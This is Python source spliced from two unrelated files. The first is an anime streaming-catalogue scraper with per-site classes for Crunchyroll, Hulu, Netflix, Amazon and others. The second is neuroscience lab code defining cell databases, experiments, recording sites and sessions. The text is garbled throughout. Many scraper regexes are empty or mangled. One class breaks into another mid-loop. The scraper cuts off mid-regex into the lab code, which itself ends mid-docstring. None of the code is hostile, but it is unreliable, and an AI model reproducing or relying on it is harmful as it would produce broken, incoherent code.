= region\n\t\tself.proxy = proxy\n\t\n\t@abstractmethod\n\tdef UpdateShowList(self, showList):\n\t\tpass\n\t\t\n\t@abstractmethod\n\tdef GetData(self):\n\t\tpass\n\n\tdef GetName(self):\n\t\treturn self.name \n\t\t\n\tdef AddShow(self, showName, showUrl, showList):\n\t\tshowNames = [showName]\n\t\tif (showName in self.titleMap):\n\t\t\tshowNames[0] = self.titleMap[showName]\n\t\tif (self.name in self.titleMap):\n\t\t\tif (showNames[0] in self.titleMap[self.name]):\n\t\t\t\tif (self.titleMap[self.name][showNames[0]] == \"\"):\n\t\t\t\t\treturn\n\t\t\t\tshowNames[0] = self.titleMap[self.name][showNames[0]]\n\t\tif (self.name in self.multiSeason):\n\t\t\tif (showNames[0] in self.multiSeason[self.name]):\n\t\t\t\tshowNames = showNames + self.multiSeason[self.name][showNames[0]]\n\t\tfor name in showNames:\n\t\t\ttranslated_name = unidecode(name.lower()).translate(transtable).replace(' ', ' ')\n\t\t\tif (translated_name in showList):\n\t\t\t\tshowList[translated_name]['sites'][self.name] = showUrl\n\t\t\telse:\n\t\t\t\tshow_obj = {'name': name, 'sites': {self.name: 
showUrl}}\n\t\t\t\tshowList[translated_name] = show_obj\n\t\t\nclass Crunchyroll(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"crunchyroll\"\n\t\t\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show[0].strip())\n\t\t\tshowUrl = \"http://www.crunchyroll.com\" + show[1]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\twith open('credentials.json') as creds_file:\n\t\t\tcredentials = json.load(creds_file)\n\t\tcrSession = requests.Session()\n\t\tparams = {\n\t\t\t\"formname\": \"RpcApiUser_Login\",\n\t\t\t\"failurl\": \"http://www.crunchyroll.com/login\",\n\t\t\t\"name\": credentials['crunchyroll']['username'], \n\t\t\t\"password\": credentials['crunchyroll']['password']\n\t\t}\n\t\tcrSession.post('https://www.crunchyroll.com/?a=formhandler', params=params, proxies = self.proxy)\n\t\tblob = crSession.get('http://www.crunchyroll.com/videos/anime/alpha?group=all', proxies = self.proxy)\n\t\tregex = '([^\\\"]*)'\n\t\treturn re.findall(regex, blob.text)\n\t\t\nclass Funimation(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"funimation\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show['title'].strip())\n\t\t\tshowUrl = 'http://www.funimation.com/shows/' + show['id']\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tresults = []\n\t\tblob = requests.get('https://api-funimation.dadcdigital.com/xml/longlist/content/page/?id=shows&sort=&title=All+Shows&sort_direction=DESC&role=g&itemThemes=dateAddedShow&limit=500&offset=0&territory=' + self.region, proxies = self.proxy)\n\t\tlist = ET.fromstring(blob.text)\n\t\tfor show in list.iterfind('item'):\n\t\t\tresults.append({'title': show.find('title').text, 'id': show.find('id').text})\n\t\treturn results\n\t\t\nclass Hulu(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"hulu\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show['show']['name'].strip())\n\t\t\tshowUrl = 'http://www.hulu.com/' + show['show']['canonical_name']\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\toauth_blob = requests.get('http://www.hulu.com/lets-get-a-404')\n\t\toauth_regex = \"w.API_DONUT = '([^']*)';\"\n\t\toauth_key = re.findall(oauth_regex, oauth_blob.text)[0]\n\t\tmovies_blob = requests.get('http://www.hulu.com/mozart/v1.h2o/movies?exclude_hulu_content=1&genre=anime&sort=release_with_popularity&_language=en&_region=us&items_per_page=1000&position=0®ion=us&locale=en&language=en&access_token=' + oauth_key)\n\t\tanime_blob = 
requests.get('http://www.hulu.com/mozart/v1.h2o/shows?exclude_hulu_content=1&genre=anime&sort=release_with_popularity&_language=en&_region=us&items_per_page=1000&position=0®ion=us&locale=en&language=en&access_token=' + oauth_key)\n\t\tanime_blob_2 = requests.get('http://www.hulu.com/mozart/v1.h2o/shows?exclude_hulu_content=1&genre=anime&sort=release_with_popularity&_language=en&_region=us&items_per_page=1000&position=500®ion=us&locale=en&language=en&access_token=' + oauth_key)\n\t\tanimation_blob = requests.get('http://www.hulu.com/mozart/v1.h2o/shows?exclude_hulu_content=1&genre=animation&sort=release_with_popularity&_language=en&_region=us&items_per_page=1000&position=0®ion=us&locale=en&language=en&access_token=' + oauth_key)\n\t\tanimation_list = json.loads(animation_blob.text)['data']\n\t\tanimation_list = [x for x in animation_list if x['show']['genre'] == \"Anime\"]\n\t\tanime_list = json.loads(anime_blob.text)['data'] + json.loads(anime_blob_2.text)['data'] + json.loads(movies_blob.text)['data']\n\t\treturn anime_list + animation_list\n\t\t\nclass Netflix(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"netflix\"\n\t\tself.countryCodes = {\n\t\t\t'us': '78',\n\t\t\t'uk': '46',\n\t\t\t'ca': '33',\n\t\t\t'au': '23'\n\t\t}\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show[1].strip())\n\t\t\tshowUrl = \"http://www.netflix.com/title/\" + show[0]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\twith open('credentials.json') as creds_file:\n\t\t\tcredentials = json.load(creds_file)\n\t\theaders = {\n\t\t\t\"X-Mashape-Key\": credentials['mashape'],\n\t\t\t\"Accept\": \"application/json\"\n\t\t}\n\t\tdataBlob = requests.get(\"https://unogs-unogs-v1.p.mashape.com/api.cgi?q=-!1900,3000-!0,5-!0,10-!10695%2C11146%2C2653%2C2729%2C3063%2C413820%2C452%2C6721%2C7424%2C9302-!Any-!Any-!Any-!gt0&t=ns&st=adv&ob=Relevance&p=1&sa=and&cl=\" + self.countryCodes[self.region], headers = headers)\n\t\treturn json.loads(dataBlob.text)[\"ITEMS\"]\n\t\t\n\t\t\nclass Daisuki(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"daisuki\"\n\t\tself.countryCodes = {\n\t\t\t'us': 'us',\n\t\t\t'uk': 'gb',\n\t\t\t'ca': 'ca',\n\t\t\t'au': 'au'\n\t\t}\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\ttranstable = {ord(c): None for c in string.punctuation}\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show['title'].strip())\n\t\t\tshowUrl = \"http://www.daisuki.net/anime/detail/\" + show['ad_id']\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tblob = requests.get('http://www.daisuki.net/bin/wcm/searchAnimeAPI?api=anime_list&searchOptions=¤tPath=%2Fcontent%2Fdaisuki%2F' + self.countryCodes[self.region] + '%2Fen', proxies = self.proxy)\n\t\treturn blob.json()['response']\n\t\t\nclass Viewster(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"viewster\"\n\tdef 
UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show['Title'].strip())\n\t\t\tshowUrl = \"https://www.viewster.com/serie/\" + show['OriginId']\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tapi_blob = requests.get('https://www.viewster.com/', proxies = self.proxy)\n\t\tapi_token = api_blob.cookies['api_token']\n\t\theaders = {'Auth-token': parse.unquote(api_token)}\n\t\tanime_blob = requests.get('https://public-api.viewster.com/series?pageSize=100&pageIndex=1&genreId=58', headers = headers, proxies = self.proxy)\n\t\tanime_blob2 = requests.get('https://public-api.viewster.com/series?pageSize=100&pageIndex=2&genreId=58', headers = headers, proxies = self.proxy)\n\t\tsimul_blob = requests.get('https://public-api.viewster.com/series?pageSize=100&pageIndex=1&genreId=67', headers = headers, proxies = self.proxy)\n\t\ttry: \n\t\t\tsimul_items = json.loads(simul_blob.text)['Items']\n\t\t\treturn json.loads(anime_blob.text)['Items'] + json.loads(anime_blob2.text)['Items'] + simul_items\n\t\texcept:\n\t\t\treturn json.loads(anime_blob.text)['Items'] + json.loads(anime_blob2.text)['Items']\n\t\t\nclass AnimeLab(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"animelab\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show['name'].strip())\n\t\t\tshowUrl = \"https://www.animelab.com/shows/\" + show['slug']\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tresults = []\n\t\tfor curIndex in range(0, 5):\n\t\t\tblob = requests.get('https://www.animelab.com/api/shows/all?limit=100&page=' + str(curIndex), proxies = self.proxy)\n\t\t\tresults += json.loads(blob.text)['list']\n\t\treturn results\n\t\t\nclass Animax(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"animax\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\t#print(show)\n\t\t\tshowName = unidecode(show[1].strip())\n\t\t\tshowUrl = \"https://www.animaxtv.co.uk/\" + show[0]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tblob = requests.get('http://www.animaxtv.co.uk/programs', proxies = self.proxy)\n\t\tregex1 = '(.*)'\n\t\tregex2 = ''\n\t\tdata1 = re.findall(regex1, blob.text)[0]\n\t\treturn re.findall(regex2, data1)\n\t\t\nclass Hanabee(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"hanabee\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tfor show in self.shows:\n\t\t\t#print(show)\n\t\t\tshowName = unidecode(show[1].strip())\n\t\t\tshowUrl = \"http://hanabee.tv\" + show[0]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tresults = []\n\t\tfor curIndex in range(0, 5):\n\t\t\tblob = 
requests.get('http://hanabee.tv/shows/?vod-filter-button=on&start=' + str(curIndex * 10) , proxies = self.proxy)\n\t\t\tregex = '
 ([^\"]*) 
'\n\t\t\tresults += re.findall(regex, blob.text)\n\t\treturn results\n\t\t\nclass AnimeNetwork(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"animenetwork\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show[0].strip().replace(''', '\\''))\n\t\t\tshowUrl = \"http://www.theanimenetwork.com\" + show[1]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tresults = []\n\t\tpages = ['0'] + list(string.ascii_uppercase)\n\t\tfor letter in pages:\n\t\t\tblob = requests.get('http://www.theanimenetwork.com/Watch-Anime/Alphabet/' + letter, proxies = self.proxy)\n\t\t\tregex = '
 ([^\"]*) 
[\\n\\s]*'\n\t\t\tprint(letter)\n\t\t\tresults += re.findall(regex, blob.text, re.M)\n\t\treturn results\n\nclass TubiTV(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"tubitv\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = self.shows[show]['title']\n\t\t\tshowTypes = {'v': 'video', 's': 'series'}\n\t\t\tshowUrl = 'http://tubitv.com/' + showTypes[self.shows[show]['type']] + '/' + str(int(show))\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tblob = requests.get('http://tubitv.com/oz/containers/anime/content?cursor=0&limit=1000', proxies = self.proxy)\n\t\treturn json.loads(blob.text)['contents']\n\nclass AnimeStrike(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"animestrike\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show[0].strip())\n\t\t\tshowUrl = show[1]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tresults = []\n\t\tfor curIndex in range(1, 15):\n\t\t\theaders = {\n\t\t\t\t'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'\n\t\t\t}\n\t\t\tblob = requests.get('https://www.amazon.com/s/ref=sr_ex_n_1?rh=n%3A2858778011%2Cp_n_subscription_id%3Asaikindo&bbn=2858778011&ie=UTF8&qid=1512620557&page=' + str(curIndex) , headers = headers, proxies = self.proxy)\n\t\t\tregex = '[\\n\\s]*'\n\t\tresults += re.findall(regex_tv, blob_tv.text, re.M)\n\t\tblob_movies = requests.get('https://www.hidive.com/movies', proxies = self.proxy)\n\t\tregex_movies = '
[\\n\\s]*'\n\t\tresults += re.findall(regex_movies, blob_movies.text, re.M)\n\t\treturn results\n\nclass YahooView(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"yahoo\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show['title'].strip().replace(''', '\\''))\n\t\t\tshowUrl = \"https://view.yahoo.com/show/\" + show['id']\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\tblob = requests.get('https://view.yahoo.com/browse/tv/genre/anime/shows', proxies = self.proxy)\n\t\tregex = '\\\"seriesListItems\\\":(.*)},\\\"StreamStore\\\"'\n\t\tresultsJson = re.findall(regex, blob.text)[0]\n\t\tresults = json.loads(resultsJson)\n\t\treturn results\n\nclass AmazonPrime(AnimeSource):\n\tdef __init__(self, titleMap, multiSeason, region = 'us', proxy = {}):\n\t\tAnimeSource.__init__(self, titleMap, multiSeason, region, proxy)\n\t\tself.name = \"amazon\"\n\tdef UpdateShowList(self, showList):\n\t\tself.shows = self.GetData()\n\t\tif (len(self.shows) == 0):\n\t\t\tsys.exit('0 shows found for ' + self.name + ', aborting')\n\t\tfor show in self.shows:\n\t\t\tshowName = unidecode(show[0].strip())\n\t\t\tshowUrl = show[1]\n\t\t\tAnimeSource.AddShow(self, showName, showUrl, showList)\n\tdef GetData(self):\n\t\turls = {\n\t\t\t'us': 'https://www.amazon.com/s/gp/search/ref=sr_nr_p_n_entity_type_1?fst=as%3Aoff&rh=n%3A2858778011%2Cp_n_theme_browse-bin%3A2650364011%2Cp_85%3A2470955011%2Cp_n_entity_type%3A14069184011%7C14069185011&bbn=2858778011&ie=UTF8&qid=1515170443&rnid=14069183011&page=',\n\t\t\t'uk': 'https://www.amazon.co.uk/s/gp/search/ref=sr_nr_p_n_entity_type_1?fst=as%3Aoff&rh=n%3A3280626031%2Cp_n_theme_browse-bin%3A3046743031%2Cp_n_ways_to_watch%3A7448660031%2Cp_n_entity_type%3A9739952031%7C9739955031&bbn=3280626031&ie=UTF8&qid=1515297590&rnid=9739949031&page='\n\t\t}\n\t\tresults = []\n\t\tfor curIndex in range(1, 15):\n\t\t\theaders = {\n\t\t\t\t'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36'\n\t\t\t}\n\t\t\tblob = requests.get(urls[self.region] + str(curIndex) , headers = headers, proxies = self.proxy)\n\t\t\tregex = '> cellDB.findcell('test000','20001201a',1,11)\n >> cellDB.findcell(onecell)\n '''\n if isinstance(firstParam,str):\n onecell = CellInfo(firstParam,'',behavSession,tetrode,cluster)\n else:\n onecell = firstParam\n cellIndex = None\n for ind,cell in enumerate(self):\n if onecell.animalName==cell.animalName:\n if onecell.behavSession==cell.behavSession:\n if onecell.tetrode==cell.tetrode:\n if onecell.cluster==cell.cluster:\n cellIndex = ind\n return cellIndex\n def set_soundResponsive(self,zScores,threshold=3):\n '''\n Set soundResponsive flag for each cell, given zScores\n zScores: numpy array (nTimeBins,nConditions,nCells)\n threshold: above this or below negative this it is considered responsive\n '''\n for indcell,onecell in enumerate(self):\n onecell.soundResponsive = np.any(abs(zScores[:,:,indcell])>threshold)\n def get_vector(self,varname):\n '''\n EXAMPLE: cellDB.get_vector('tetrode')\n '''\n return np.array([getattr(onecell, varname) for onecell in self])\n def subset(self,indexes):\n subsetDB = CellDatabase()\n if isinstance(indexes,np.ndarray) and 
indexes.dtype==bool:\n indexes = np.flatnonzero(indexes)\n for ind in indexes:\n subsetDB.append(self[ind])\n return subsetDB\n def __str__(self):\n objStrings = []\n for ind,c in enumerate(self):\n objStrings.append('[%d] %s\\n'%(ind,c))\n return ''.join(objStrings)\n def save_locked_spikes(self,outputDir,timeRange=np.array([-0.3,0.9]),lockTo=1):\n sessionanalysis.save_data_each_cell(self,outputDir,timeRange=timeRange,lockTo=lockTo)\n def evaluate_response(self):\n # NOT IMPLEMENTED\n pass\n\n\nclass MultiUnitDatabase(list):\n '''Container of set of multiunit sites.\n '''\n def __init__(self):\n super(MultiUnitDatabase, self).__init__()\n def __str__(self):\n objStrings = []\n for ind,c in enumerate(self):\n objStrings.append('[%d] %s\\n'%(ind,c))\n return ''.join(objStrings)\n def save_locked_spikes(self,outputDir,timeRange=np.array([-0.3,0.9]),lockTo=1):\n sessionanalysis.save_data_each_mu(self,outputDir,timeRange=timeRange,lockTo=lockTo)\n\n\n# ----------------------- THE NEW (2016) VERSION ------------------------\n\n'''\nDesign decisions:\n\n- Experiment should add sessions directly to the last site in the list of sites.\n This avoids needing to return a handle to each site during an experiment.\n The experimenter can instead just return handles to each experiment object.\n Pros:\n - No need to return a handle to every site (it gets confusing quickly)\n Cons:\n - Sessions are always added to the last site that was created - the experimenter does not choose the site to add a session to (could be misleading?)\n\n- 'tetrodes' should not be specified when creating individual sites\n Everyone clusters all tetrodes anyway\n (Nick originally included the 'tetrodes' argument to specify which tetrodes had good signals at a specific site,\n but even he just clusters everything now).\n\n Alternatives for the 'tetrodes' variable:\n * Specify it at the experiment level\n Pros:\n - Having 'tetrodes' as an attribute is really convenient to iterate over when clustering.\n Cons:\n - The numbers rarely change and can be determined from the data (the names of the .spikes files)\n - Sometimes we use single electrodes (very rarely) and might possibly use stereotrodes or\n silicon probes with a linear array of recording sites - neither would be added to openEphys GUI as\n a 'Tetrode' and the .spikes file would show up as something like 'SingleElectrode1.spikes' or\n 'Stereotrode1.spikes'. Having an argument for 'tetrode' may not always be applicable to all experiments\n\n * Do not specify it at all\n Pros:\n - More flexibility (applicable to experiments where we are not recording with tetrodes)\n Cons:\n - When clustering, we will need to read the ephys session files to find out which tetrodes were collected\n\n * Specify both an electrode name and a range of values ('Tetrode', [1, 2, 3, 4])\n Pros:\n - Applicable to other recording setups (e.g. 
'SingleElectrode', range(1, 33) for 32 single electrode recording sites on a linear array)\n Cons:\n - More variables to store, and we don't use other kinds of recording setups now.\n * Have a dict of metadata entries store the tetrode numbers\n Something like:\n experiment.metadata={'electrodeName': 'Tetrode',\n 'electrodeNums': [1, 2, 3, 4, 5, 6, 7, 8],\n 'location': 'cortex'}\n Pros:\n - Flexible, can add any metadata that you want about the experiment and can have a set of defaults per animal\n Cons:\n - Need to have the right key names to be able to use the values in scripts later\n\n* Should sessions convert the and date into the ephys session folder and store that?\n Also convert the behav suffix and paradigm into the behav filename?\n\n Pros:\n The relevant information for clustering and plotting reports will be easy to add\n to a pandas dataframe because we can do vars(session) and this returns a dict,\n which we can add to a pandas dataframe directly. Later, we can simply use this\n column instead of having to get multiple columns and create the correct\n Cons:\n This is redundant if we are also storing the date, timestamp, paradigm, etc.\n\n---\n\nclass InfoRecording(object):\n InfoRecordings is a container of experiments.\n One per subject\n Attributes:\n subject (str): The name of the subject\n experiments (list): A list of all the experiments conducted with this subject\n Methods:\n add_experiment: Add a new experiment for this subject\n\n\n\n'''\n\n\n\nclass Experiment(object):\n '''\n Experiment is a container of sites.\n One per day.\n Attributes:\n subject(str): Name of the subject\n date (str): The date the experiment was conducted\n brainarea (str): The area of the brain where the recording was conducted\n sites (list): A list of all recording sites for this experiment\n info (str): Extra info about the experiment\n tetrodes (list): Default tetrodes for this experiment\n TODO: Fail gracefully if the experimenter tries to add sessions without adding a site first\n TODO: Should the info attr be a dictionary?\n '''\n def __init__(self, subject, date, brainarea, info=''):\n self.subject=subject\n self.date=date\n self.brainarea=brainarea\n self.info=info\n self.sites=[]\n self.tetrodes = [1,2,3,4,5,6,7,8]\n self.maxDepth = None\n self.shankEnds = None\n # self.probeGeometryFile = '/tmp/A4x2tet_5mm_150_200_121.py' #TODO: Implement something for probe geometry long-term storage?\n def add_site(self, depth, date=None, tetrodes=None):\n '''\n Append a new Site object to the list of sites.\n Args:\n depth (int): The depth of the tip of the electrode array for this site\n date (str): The date of recording for this site\n tetrodes (list): Tetrodes to analyze for this site\n Returns:\n site (celldatabase.Site object): Handle to site object\n '''\n if date is None:\n date = self.date\n if tetrodes is None:\n tetrodes = self.tetrodes\n site=Site(self.subject, date, self.brainarea, self.info, depth, tetrodes)\n self.sites.append(site)\n return site\n def add_session(self, timestamp, behavsuffix, sessiontype, paradigm, date=None):\n '''\n Add a new Session object to the list of sessions belonging to the most recent Site\n Args:\n timestamp (str): The timestamp used by openEphys GUI to name the session\n behavsuffix (str): The suffix of the behavior file\n sessiontype (str): A string describing what kind of session this is.\n paradigm (str): The name of the paradigm used to collect the session\n date (str): The recording date. 
Only needed if the date of the session is different\n from the date of the Experiment/Site (if you record past midnight)\n '''\n try:\n activeSite = self.sites[-1] #Use the most recent site for this experiment\n except IndexError:\n raise IndexError('There are no sites to add sessions to')\n session = activeSite.add_session(timestamp,\n behavsuffix,\n sessiontype,\n paradigm,\n date)\n return session\n def pretty_print(self, sites=True, sessions=False):\n '''\n Print a string with date, brainarea, and optional list of sites/sessions by index\n Args:\n sites (bool): Whether to list all sites in the experiment by index\n sessions (bool): Whether to list all sessions in each site by index\n Returns:\n message (str): A formatted string with the message to print\n '''\n message = []\n message.append('Experiment on {} in {}\\n'.format(self.date, self.brainarea))\n if sites:\n for indSite, site in enumerate(self.sites):\n #Append the ouput of the pretty_print() func for each site\n message.append(' [{}]: {}'.format(indSite,\n site.pretty_print(sessions=sessions)))\n return ''.join(message)\n def site_comment(self, message):\n '''\n Add a comment string to the list of comments for the most recent Site.\n This method allows commenting on Site objects without returning handles to them.\n Args:\n message (str): The message string to append to the list of comments for the Site\n '''\n activeSite = self.sites[-1] #Use the most recent site for this experiment\n activeSite.comment(message)\n def session_comment(self, message):\n '''\n Add a comment string to the list of comments for the most recent Session.\n This method allows commenting on Session objects without returning handles to them.\n Args:\n message (str): The message string to append to the list of comments for the Session\n '''\n activeSite = self.sites[-1] #Use the most recent Site for this Experiment\n activeSession = activeSite.sessions[-1] #Use the most recent Session for this Site\n activeSession.comment(message)\n\nclass Site(object):\n '''\n Site is a container of sessions.\n One per group of sessions which contain the same neurons and should be clustered together\n Attributes:\n subject(str): Name of the subject\n date (str): The date the experiment was conducted\n brainarea (str): The area of the brain where the recording was conducted\n info (str): Extra info about the experiment\n depth (int): The depth in microns at which the sessions were recorded\n tetrodes (list): Tetrodes for this site\n sessions (list): A list of all the sessions recorded at this site\n comments (list of str): Comments for this site\n clusterFolder (str): The folder where clustering info will be saved for this site\n '''\n def __init__(self, subject, date, brainarea, info, depth, tetrodes):\n self.subject=subject\n self.date=date\n self.brainarea=brainarea\n self.info=info\n self.depth=depth\n self.tetrodes = tetrodes\n self.sessions=[]\n self.comments=[]\n self.clusterFolder = 'multisession_{}_{}um'.format(self.date, self.depth)\n def remove_tetrodes(self, tetrodesToRemove):\n '''\n Remove tetrodes from a site's list of tetrodes\n '''\n if not isinstance(tetrodesToRemove, list):\n tetrodesToRemove = [tetrodesToRemove]\n for tetrode in tetrodesToRemove:\n self.tetrodes.remove(tetrode)\n def add_session(self, timestamp, behavsuffix, sessiontype, paradigm, date=None):\n '''\n Add a session to the list of sessions.\n Args:\n timestamp (str): The timestamp used by openEphys GUI to name the session\n behavsuffix (str): The suffix of the behavior file\n sessiontype 
(str): A string describing what kind of session this is.\n paradigm (str): The name of the paradigm used to collect the session\n date (str): The recording date. Only needed if the date of the session is different\n from the date of the Experiment/Site (if you record past midnight)\n '''\n if date is None:\n date=self.date\n session = Session(self.subject,\n date,\n self.brainarea,\n self.info,\n self.depth,\n self.tetrodes,\n timestamp,\n behavsuffix,\n sessiontype,\n paradigm)\n self.sessions.append(session)\n return session\n def session_ephys_dirs(self):\n '''\n Returns a list of the ephys directories for all sessions recorded at this site.\n Returns:\n dirs (list): List of ephys directories for each session in self.sessions\n '''\n dirs = [session.ephys_dir() for session in self.sessions]\n return dirs\n # def session_behav_filenames(self):\n # '''\n # Returns a list of the behavior filenames for all sessions recorded at this site.\n # Returns:\n # fns (list): list of behavior filenames for each session in self.sessions\n # DEPRECATED (2017-10-30): session function no longer implemented\n # '''\n # fns = [session.behav_filename() for session in self.sessions]\n # return fns\n def session_types(self):\n '''\n Returns a list of the session type strings for all sessions recorded at this site.\n Returns:\n types (list): List of the sessiontype strings for each session in self.sessions\n DEPRECATED (2017-10-30): We just have the generator in the cluster_info method to be clear\n about what is returned per session and what is a site attr.\n '''\n types=[session.sessiontype for session in self.sessions]\n return types\n # def find_session(self, sessiontype):\n # '''\n # Return indexes of sessions of type sessiontype.\n # Args:\n # sessiontype (str): The sessiontype string to search for.\n # Returns:\n # inds (list): List of indices of sessions of type sessiontype.\n # '''\n # inds = [i for i, st in enumerate(self.session_types()) if st==sessiontype]\n # return inds\n def cluster_info(self):\n '''\n Returns a dictionary with the information needed to identify clusters that come from this site.\n Returns:\n infoDict (dict): dictionary containing info defining clusters that come from this site\n '''\n infoDict = {\n 'subject':self.subject,\n 'date':self.date,\n 'brainArea': self.brainarea,\n 'info': self.info,\n 'depth':self.depth,\n 'ephysTime':[session.timestamp for session in self.sessions],\n 'paradigm':[session.paradigm for session in self.sessions],\n 'behavSuffix':[session.behavsuffix for session in self.sessions],\n 'sessionType':[session.sessiontype for session in self.sessions]\n }\n return infoDict\n\n def pretty_print(self, sessions=False):\n '''\n Print a string with depth, number of sessions, and optional list of sessions by index\n Args:\n sessions (bool): Whether to list all sessions by index\n Returns:\n message (str): A formatted string with the message to print\n '''\n message=[]\n message.append('Site at {}um with {} sessions\\n'.format(self.depth, len(self.sessions)))\n if sessions:\n for session in self.sessions:\n message.append(' {}\\n'.format(session.pretty_print()))\n return ''.join(message)\n def comment(self, message):\n '''\n Add a comment to self.comments\n Args:\n message (str): The message string to append to self.comments\n '''\n self.comments.append(message)\n\nclass Session(object):\n '''\n Session is a single recorded ephys file and the associated 